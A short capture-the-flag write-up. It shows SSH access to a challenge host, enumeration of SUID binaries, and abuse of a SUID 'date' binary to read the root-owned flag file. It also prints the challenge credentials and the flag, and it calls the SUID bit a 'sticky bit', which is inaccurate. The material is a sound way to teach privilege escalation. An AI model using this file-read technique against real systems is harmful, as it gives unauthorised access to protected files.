root-me
Points: 400
- SSH into the challenge host, 0.cloud.chals.io on port 19777
- Username: ubuntu Password: jctf2022!
- Find the flag
Solving
We have login credentials for a server... so let's dive in:
ssh ubuntu@0.cloud.chals.io -p 19777
Okay... first we check sudo permissions, therefore just use sudo -l, but we don't have any permissions.
So let's look for some other quickwins, shall we?
There is something called sticky-bit in linux, with this we could possibly escalate our priviledges.
ubuntu@5f2d47a58826:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/date
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysignAh great - there are some bins we could use... I'll go with date. with this we can read a file with root permissions.
Let's try that:
ubuntu@5f2d47a58826:~$ LFILE=/root/flag.txt
ubuntu@5f2d47a58826:~$ date -f $LFILE
date: invalid date 'jctf{4cc355_6r4n73d}'Great, there it is 
GTFO bins
Please keep this in mind. Sometimes the sticky bit is neseccary, but it is also dangerous. The github page gtfobins.github.io will show the tricks to weaponize such bins.